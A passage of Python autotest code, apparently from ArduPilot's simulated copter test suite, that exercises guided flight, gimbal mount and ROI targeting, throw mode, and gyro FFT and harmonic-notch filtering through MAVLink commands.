self.start_subtest("move the vehicle using set_position_target_global_int")
# the following numbers are 5-degree-latitude and 5-degrees
# longitude - just so that we start to really move a lot.
self.fly_guided_move_global_relative_alt(5, 5, 10)
self.start_subtest("move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED")
self.fly_guided_stop(groundspeed_tolerance=0.1)
self.fly_guided_move_local(5, 5, 10)
self.start_subtest("Check target position received by vehicle using SET_MESSAGE_INTERVAL")
self.test_guided_local_position_target(5, 5, 10)
self.test_guided_local_velocity_target(2, 2, 1)
self.test_position_target_message_mode()
self.do_RTL()
def test_gripper_mission(self):
self.context_push()
ex = None
try:
self.load_mission("copter-gripper-mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.assert_vehicle_location_is_at_startup_location()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_statustext("Gripper Grabbed", timeout=60)
self.wait_statustext("Gripper Released", timeout=60)
except Exception as e:
self.print_exception_caught(e)
self.change_mode('LAND')
ex = e
self.context_pop()
self.wait_disarmed()
if ex is not None:
raise ex
def test_spline_last_waypoint(self):
self.context_push()
ex = None
try:
self.load_mission("copter-spline-last-waypoint.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_altitude(10, 3000, relative=True)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.do_RTL()
self.wait_disarmed()
if ex is not None:
raise ex
def fly_manual_throttle_mode_change(self):
self.set_parameter("FS_GCS_ENABLE", 0) # avoid GUIDED instant disarm
self.change_mode("STABILIZE")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("ACRO")
self.change_mode("STABILIZE")
self.change_mode("GUIDED")
self.set_rc(3, 1700)
self.watch_altitude_maintained(-1, 0.2) # should not take off in guided
self.run_cmd_do_set_mode(
"ACRO",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"STABILIZE",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.run_cmd_do_set_mode(
"DRIFT",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.progress("Check setting an invalid mode")
self.run_cmd(
mavutil.mavlink.MAV_CMD_DO_SET_MODE,
mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
126,
0,
0,
0,
0,
0,
want_result=mavutil.mavlink.MAV_RESULT_FAILED,
timeout=1
)
self.set_rc(3, 1000)
self.run_cmd_do_set_mode("ACRO")
self.wait_disarmed()
def test_mount_pitch(self, despitch, despitch_tolerance, timeout=10, hold=0):
tstart = self.get_sim_time()
success_start = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Mount pitch not achieved")
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
# self.progress("pitch=%f roll=%f yaw=%f" %
# (m.pointing_a, m.pointing_b, m.pointing_c))
mount_pitch = m.pointing_a/100.0 # centidegrees to degrees
if abs(despitch - mount_pitch) > despitch_tolerance:
self.progress("Mount pitch incorrect: got=%f want=%f (+/- %f)" %
(mount_pitch, despitch, despitch_tolerance))
success_start = 0
continue
self.progress("Mount pitch correct: %f degrees == %f" %
(mount_pitch, despitch))
if success_start == 0:
success_start = now
continue
if now - success_start > hold:
self.progress("Mount pitch achieved")
return
def do_pitch(self, pitch):
'''pitch aircraft in guided/angle mode'''
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, math.radians(pitch), 0]), # att
0, # roll rate (rad/s)
1, # pitch rate
0, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
def test_mount(self):
ex = None
self.context_push()
old_srcSystem = self.mav.mav.srcSystem
self.mav.mav.srcSystem = 250
self.set_parameter("DISARM_DELAY", 0)
try:
            # start by disabling GCS failsafe, otherwise we immediately
            # disarm due to (apparently) not receiving traffic from the
            # GCS for too long.  This is probably a function of --speedup
self.set_parameter("FS_GCS_ENABLE", 0)
self.progress("Setting up servo mount")
roll_servo = 5
pitch_servo = 6
yaw_servo = 7
self.set_parameter("MNT_TYPE", 1)
self.set_parameter("SERVO%u_FUNCTION" % roll_servo, 8) # roll
self.set_parameter("SERVO%u_FUNCTION" % pitch_servo, 7) # pitch
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 6) # yaw
self.reboot_sitl() # to handle MNT_TYPE changing
# make sure we're getting mount status and gimbal reports
self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
self.mav.recv_match(type='GIMBAL_REPORT',
blocking=True,
timeout=5)
# test pitch isn't stabilising:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff()
despitch = 10
despitch_tolerance = 3
self.progress("Pitching vehicle")
self.do_pitch(despitch) # will time out!
self.wait_pitch(despitch, despitch_tolerance)
# check we haven't modified:
m = self.mav.recv_match(type='MOUNT_STATUS',
blocking=True,
timeout=5)
if m.pointing_a != 0 or m.pointing_b != 0 or m.pointing_c != 0:
raise NotAchievedException("Mount stabilising when not requested")
self.progress("Enable pitch stabilization using MOUNT_CONFIGURE")
self.mav.mav.mount_configure_send(
1, # target system
1, # target component
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0, # stab-roll
1, # stab-pitch
0)
self.do_pitch(despitch)
self.test_mount_pitch(-despitch, 1)
self.progress("Disable pitch using MAV_CMD_DO_MOUNT_CONFIGURE")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0)
self.progress("Point somewhere using MOUNT_CONTROL (ANGLE)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_MAVLINK_TARGETING,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
20 * 100, # pitch
20 * 100, # roll (centidegrees)
0, # yaw
0 # save position
)
self.test_mount_pitch(20, 1)
self.progress("Point somewhere using MOUNT_CONTROL (GPS)")
self.do_pitch(despitch)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_GPS_POINT,
0,
0,
0,
0,
0,
0,
)
start = self.mav.location()
self.progress("start=%s" % str(start))
(t_lat, t_lon) = mavextra.gps_offset(start.lat, start.lng, 10, 20)
t_alt = 0
self.progress("loc %f %f %f" % (start.lat, start.lng, start.alt))
self.progress("targetting %f %f %f" % (t_lat, t_lon, t_alt))
self.do_pitch(despitch)
self.mav.mav.mount_control_send(
1, # target system
1, # target component
int(t_lat * 1e7), # lat
int(t_lon * 1e7), # lon
t_alt * 100, # alt
0 # save position
)
self.test_mount_pitch(-52, 5)
            # now test RC targeting
            self.progress("Testing mount RC targeting")
# this is a one-off; ArduCopter *will* time out this directive!
self.progress("Levelling aircraft")
self.mav.mav.set_attitude_target_send(
0, # time_boot_ms
1, # target sysid
1, # target compid
0, # bitmask of things to ignore
mavextra.euler_to_quat([0, 0, 0]), # att
1, # roll rate (rad/s)
1, # pitch rate
1, # yaw rate
0.5) # thrust, 0 to 1, translated to a climb/descent rate
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_RC_TARGETING,
0,
0,
0,
0,
0,
0,
)
try:
self.context_push()
self.set_parameter('MNT_RC_IN_ROLL', 11)
self.set_parameter('MNT_RC_IN_TILT', 12)
self.set_parameter('MNT_RC_IN_PAN', 13)
self.progress("Testing RC angular control")
# default RC min=1100 max=1900
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
self.test_mount_pitch(0, 1)
self.progress("Testing RC input down 1/4 of its range in the output, should be down 1/4 range in output")
rc12_in = 1400
rc12_min = 1100 # default
rc12_max = 1900 # default
angmin_tilt = -45.0 # default
angmax_tilt = 45.0 # default
expected_pitch = (float(rc12_in-rc12_min)/float(rc12_max-rc12_min) * (angmax_tilt-angmin_tilt)) + angmin_tilt
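                # e.g. (1400-1100)/800 * 90 - 45 = -11.25 degrees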
self.progress("expected mount pitch: %f" % expected_pitch)
if expected_pitch != -11.25:
raise NotAchievedException("Calculation wrong - defaults changed?!")
self.set_rc(12, rc12_in)
self.test_mount_pitch(-11.25, 0.01)
self.set_rc(12, 1800)
self.test_mount_pitch(33.75, 0.01)
self.set_rc_from_map({
11: 1500,
12: 1500,
13: 1500,
})
try:
self.progress(
"Issue https://discuss.ardupilot.org/t/"
"gimbal-limits-with-storm32-backend-mavlink-not-applied-correctly/51438"
)
self.context_push()
self.set_parameter("RC12_MIN", 1000)
self.set_parameter("RC12_MAX", 2000)
self.set_parameter("MNT_ANGMIN_TIL", -9000)
self.set_parameter("MNT_ANGMAX_TIL", 1000)
self.set_rc(12, 1000)
self.test_mount_pitch(-90.00, 0.01)
self.set_rc(12, 2000)
self.test_mount_pitch(10.00, 0.01)
self.set_rc(12, 1500)
self.test_mount_pitch(-40.00, 0.01)
finally:
self.context_pop()
self.set_rc(12, 1500)
self.progress("Testing RC rate control")
self.set_parameter('MNT_JSTICK_SPD', 10)
self.test_mount_pitch(0, 1)
self.set_rc(12, 1300)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-20, 1)
self.set_rc(12, 1700)
self.test_mount_pitch(-15, 1)
self.test_mount_pitch(-10, 1)
self.test_mount_pitch(-5, 1)
self.test_mount_pitch(0, 1)
self.test_mount_pitch(5, 1)
self.progress("Reverting to angle mode")
self.set_parameter('MNT_JSTICK_SPD', 0)
self.set_rc(12, 1500)
self.test_mount_pitch(0, 0.1)
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
self.context_pop()
raise e
self.progress("Testing mount ROI behaviour")
self.drain_mav_unparsed()
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_LOCATION")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_LOCATION,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-52, 5)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.test_mount_pitch(-7.5, 1)
start = self.mav.location()
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT)")
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
)
self.test_mount_pitch(-7.5, 1)
self.progress("Using MAV_CMD_DO_SET_ROI (COMMAND_INT), absolute-alt-frame")
# this is pointing essentially straight down
self.run_cmd_int(
mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
int(roi_lat*1e7),
int(roi_lon*1e7),
roi_alt,
frame=mavutil.mavlink.MAV_FRAME_GLOBAL,
)
self.test_mount_pitch(-70, 1, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("Testing mount roi-sysid behaviour")
self.test_mount_pitch(0, 0.1)
start = self.mav.location()
self.progress("start=%s" % str(start))
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
10,
20)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI_SYSID")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI_SYSID,
250,
0,
0,
0,
0,
0,
0,
)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
0 * 1000, # mm alt amsl
0 * 1000, # relalt mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(-89, 5, hold=2)
self.mav.mav.global_position_int_send(
0, # time boot ms
int(roi_lat * 1e7),
int(roi_lon * 1e7),
670 * 1000, # mm alt amsl
100 * 1000, # mm UP!
0, # vx
0, # vy
0, # vz
0 # heading
)
self.test_mount_pitch(68, 5, hold=2)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOUNT_CONFIGURE,
mavutil.mavlink.MAV_MOUNT_MODE_NEUTRAL,
0,
0,
0,
0,
0,
0,
)
self.test_mount_pitch(0, 0.1)
self.progress("checking ArduCopter yaw-aircraft-for-roi")
try:
self.context_push()
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.progress("current heading %u" % m.heading)
self.set_parameter("SERVO%u_FUNCTION" % yaw_servo, 0) # yaw
self.progress("Waiting for check_servo_map to do its job")
self.delay_sim_time(5)
start = self.mav.location()
self.progress("Moving to guided/position controller")
# the following numbers are 1-degree-latitude and
# 0-degrees longitude - just so that we start to
# really move a lot.
self.fly_guided_move_global_relative_alt(1, 0, 0)
self.guided_achieve_heading(0)
(roi_lat, roi_lon) = mavextra.gps_offset(start.lat,
start.lng,
-100,
-200)
roi_alt = 0
self.progress("Using MAV_CMD_DO_SET_ROI")
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_SET_ROI,
0,
0,
0,
0,
roi_lat,
roi_lon,
roi_alt,
)
self.wait_heading(110, timeout=600)
self.context_pop()
except Exception:
self.context_pop()
raise
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.mav.mav.srcSystem = old_srcSystem
self.disarm_vehicle(force=True)
self.reboot_sitl() # to handle MNT_TYPE changing
if ex is not None:
raise ex
def fly_throw_mode(self):
        # test throw mode (the "boomerang" test): the vehicle is
        # thrown, recovers, and returns via RTL
self.progress("Throwing vehicle away")
self.set_parameters({
"THROW_NEXTMODE": 6,
"SIM_SHOVE_Z": -30,
"SIM_SHOVE_X": -20,
})
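        # THROW mode waits for a large acceleration (the SIM_SHOVE_*
        # impulse above), recovers attitude, then switches to
        # THROW_NEXTMODE (6 == RTL)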
self.change_mode('THROW')
self.wait_ready_to_arm()
self.arm_vehicle()
try:
self.set_parameter("SIM_SHOVE_TIME", 500, retries=3)
except ValueError:
# the shove resets this to zero
pass
tstart = self.get_sim_time()
self.wait_mode('RTL')
max_good_tdelta = 15
tdelta = self.get_sim_time() - tstart
self.progress("Vehicle in RTL")
self.wait_rtl_complete()
self.progress("Vehicle disarmed")
if tdelta > max_good_tdelta:
raise NotAchievedException("Took too long to enter RTL: %fs > %fs" %
(tdelta, max_good_tdelta))
self.progress("Vehicle returned")
def hover_and_check_matched_frequency_with_fft(self, dblevel=-15, minhz=200, maxhz=300, peakhz=None, reverse=None):
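        # reverse=True inverts the expectation: finding a peak becomes
        # the failure case (used after a notch should have removed it)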
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
        # batch sampler defaults give 1024-point FFT and sample rate of 1kHz, so roughly 1Hz/bin
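        # (1000 / 1024 ~= 0.977Hz per bin)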
freq = psd["F"][numpy.argmax(psd["X"][minhz:maxhz]) + minhz] * (1000. / 1024.)
peakdb = numpy.amax(psd["X"][minhz:maxhz])
if peakdb < dblevel or (peakhz is not None and abs(freq - peakhz) / peakhz > 0.05):
if reverse is not None:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
if reverse is not None:
raise NotAchievedException(
"Detected motor peak at %fHz, throttle %f%%, %fdB" %
(freq, vfr_hud.throttle, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
return freq, vfr_hud, peakdb
def fly_dynamic_notches(self):
"""Use dynamic harmonic notch to control motor noise."""
self.progress("Flying with dynamic notches")
self.context_push()
ex = None
try:
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100, # set the gyro filter high so we can observe behaviour
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_VIB_MOT_MAX": 350,
"SIM_GYR1_RND": 20,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 200, 300)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.,
"INS_HNTCH_HMNCS": 5, # first and third harmonic
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
})
self.reboot_sitl()
freq, vfr_hud, peakdb1 = self.hover_and_check_matched_frequency_with_fft(-10, 20, 350, reverse=True)
# now add double dynamic notches and check that the peak is squashed
self.set_parameter("INS_HNTCH_OPTS", 1)
self.reboot_sitl()
freq, vfr_hud, peakdb2 = self.hover_and_check_matched_frequency_with_fft(-15, 20, 350, reverse=True)
# double-notch should do better, but check for within 5%
if peakdb2 * 1.05 > peakdb1:
raise NotAchievedException(
"Double-notch peak was higher than single-notch peak %fdB > %fdB" %
(peakdb2, peakdb1))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def hover_and_check_matched_frequency(self, dblevel=-15, minhz=200, maxhz=300, fftLength=32, peakhz=None):
# find a motor peak
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
        # batch sampler defaults give 1024-point FFT and sample rate of 1kHz, so roughly 1Hz/bin
scale = 1000. / 1024.
sminhz = int(minhz * scale)
smaxhz = int(maxhz * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < dblevel:
raise NotAchievedException("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
elif peakhz is not None and abs(freq - peakhz) / peakhz > 0.05:
raise NotAchievedException("Did not detect a motor peak at %fHz, found %fHz at %fdB" % (peakhz, freq, peakdb))
else:
self.progress("Detected motor peak at %fHz, throttle %f%%, %fdB" % (freq, vfr_hud.throttle, peakdb))
# we have a peak make sure that the FFT detected something close
# logging is at 10Hz
mlog = self.dfreader_for_current_onboard_log()
# accuracy is determined by sample rate and fft length, given our use of quinn we could probably use half of this
freqDelta = 1000. / fftLength
pkAvg = freq
nmessages = 1
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
freqs = []
while m is not None:
nmessages = nmessages + 1
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6)
)
# peak within resolution of FFT length
pkAvg = numpy.median(numpy.asarray(freqs))
self.progress("Detected motor peak at %fHz processing %d messages" % (pkAvg, nmessages))
        # peak must lie within the FFT's frequency resolution
        if abs(pkAvg - freq) > freqDelta:
            raise NotAchievedException("FFT did not detect a motor peak within %fHz: found %f, wanted %f" % (freqDelta, pkAvg, freq))
return freq
def fly_gyro_fft_harmonic(self):
"""Use dynamic harmonic notch to control motor noise with harmonic matching of the first harmonic."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT harmonic - Gyro sample rate")
self.context_push()
ex = None
        # we are dealing with probabilistic scenarios involving threads; have two bites at the cherry
try:
self.start_subtest("Hover to calculate approximate hover frequency")
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"FFT_THR_REF": self.get_parameter("MOT_THST_HOVER"),
"SIM_GYR1_RND": 20, # enable a noisy gyro
})
            # enabling FFT will also enable the arming check,
            # self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
})
# Step 1: inject actual motor noise and use the FFT to track it
self.set_parameters({
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 64)
# Step 2: add a second harmonic and check the first is still tracked
self.start_subtest("Add a fixed frequency harmonic at twice the hover frequency "
"and check the right harmonic is found")
self.set_parameters({
"SIM_VIB_FREQ_X": freq * 2,
"SIM_VIB_FREQ_Y": freq * 2,
"SIM_VIB_FREQ_Z": freq * 2,
"SIM_VIB_MOT_MULT": 0.25, # halve the motor noise so that the higher harmonic dominates
})
self.reboot_sitl()
self.hover_and_check_matched_frequency(-15, 100, 250, 64, None)
# Step 3: switch harmonics mid flight and check for tracking
self.start_subtest("Switch harmonics mid flight and check the right harmonic is found")
self.set_parameter("FFT_HMNC_PEAK", 0)
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 10
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
self.set_parameter("SIM_VIB_MOT_MULT", 5.0)
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
vfr_hud = self.mav.recv_match(type='VFR_HUD', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
mlog = self.dfreader_for_current_onboard_log()
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
freqs = []
while m is not None:
freqs.append(m.PkAvg)
m = mlog.recv_match(
type='FTN1',
blocking=False,
condition="FTN1.TimeUS>%u and FTN1.TimeUS<%u" % (tstart * 1.0e6, tend * 1.0e6))
# peak within resolution of FFT length, the highest energy peak switched but our detection should not
pkAvg = numpy.median(numpy.asarray(freqs))
freqDelta = 1000. / self.get_parameter("FFT_WINDOW_SIZE")
if abs(pkAvg - freq) > freqDelta:
raise NotAchievedException("FFT did not detect a harmonic motor peak, found %f, wanted %f" % (pkAvg, freq))
# Step 4: dynamic harmonic
self.start_subtest("Enable dynamic harmonics and make sure both frequency peaks are attenuated")
# find a motor peak
freq, vfr_hud, peakdb = self.hover_and_check_matched_frequency_with_fft(-15, 100, 350)
# now add a dynamic notch and check that the peak is squashed
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_HMNCS": 3,
"INS_HNTCH_MODE": 4,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": vfr_hud.throttle/100.0,
"INS_HNTCH_ATT": 100,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_OPTS": 3,
})
self.reboot_sitl()
            # 5dB is far in excess of the attenuation that the double dynamic-harmonic notch is able
            # to provide (-7dB on average), but without the notch the peak is around 20dB, so this is still a safe test
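            # As a reference sketch (assumed amplitude/dB relation, not
            # part of the pass/fail criteria): attenuation in dB maps to
            # an amplitude ratio of 10**(dB/20), so a -7dB notch leaves
            # roughly 45% of the original amplitude.
            notch_attenuation_db = -7.0
            amplitude_ratio = 10.0 ** (notch_attenuation_db / 20.0)  # ~0.45
            self.progress("Expected notch amplitude ratio: %.2f" % amplitude_ratio)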
self.hover_and_check_matched_frequency_with_fft(5, 100, 350, reverse=True)
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MULT": 1.0,
})
            # prevent parameter updates from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# need a final reboot because weird things happen to your
# vehicle state when switching back from EKF type 10!
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gyro_fft(self):
"""Use dynamic harmonic notch to control motor noise."""
# basic gyro sample rate test
self.progress("Flying with gyro FFT - Gyro sample rate")
self.context_push()
ex = None
try:
# magic tridge EKF type that dramatically speeds up the test
self.set_parameters({
"AHRS_EKF_TYPE": 10,
"EK2_ENABLE": 0,
"EK3_ENABLE": 0,
"INS_LOG_BAT_MASK": 3,
"INS_LOG_BAT_OPT": 0,
"INS_GYRO_FILTER": 100,
"INS_FAST_SAMPLE": 0,
"LOG_BITMASK": 958,
"LOG_DISARMED": 0,
"SIM_DRIFT_SPEED": 0,
"SIM_DRIFT_TIME": 0,
"SIM_GYR1_RND": 20, # enable a noisy motor peak
})
# enabling FFT will also enable the arming check,
# self-testing the functionality
self.set_parameters({
"FFT_ENABLE": 1,
"FFT_MINHZ": 50,
"FFT_MAXHZ": 450,
"FFT_SNR_REF": 10,
"FFT_WINDOW_SIZE": 128,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 0,
})
            # Step 1: inject a very precise noise peak at 250Hz and make sure the in-flight FFT
            # can detect it really accurately. For a 128-point FFT the frequency resolution is 8Hz,
            # so a 250Hz peak should be detectable within 5%
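            # A minimal sanity sketch of that claim (window size and
            # target frequency are from this test; the ~1kHz gyro rate
            # is an assumption about the SITL backend):
            fft_bin_hz = 1000.0 / 128  # ~7.8Hz per bin
            self.progress("Expected FFT resolution: %.1fHz (%.1f%% of 250Hz)" %
                          (fft_bin_hz, 100.0 * fft_bin_hz / 250.0))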
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 250,
"SIM_VIB_FREQ_Y": 250,
"SIM_VIB_FREQ_Z": 250,
})
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 128, 250)
            # Step 1b: run the same test with an FFT length of 256, which is needed to flush out a
            # whole host of bugs related to uint8_t. This also tests the frequency resolution very accurately
self.set_parameter("FFT_WINDOW_SIZE", 256)
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 256, 250)
self.set_parameter("FFT_WINDOW_SIZE", 128)
# Step 2: inject actual motor noise and use the standard length FFT to track it
self.start_subtest("Hover and check that the FFT can find the motor noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 32,
"FFT_WINDOW_OLAP": 0.5,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 32)
self.set_parameter("SIM_VIB_MOT_MULT", 1.)
# Step 3: add a FFT dynamic notch and check that the peak is squashed
self.start_subtest("Add a dynamic notch, hover and check that the noise peak is now gone")
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": 1.0,
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_MODE": 4,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# fly fast forrest!
self.set_rc(3, 1900)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.set_rc(3, 1500)
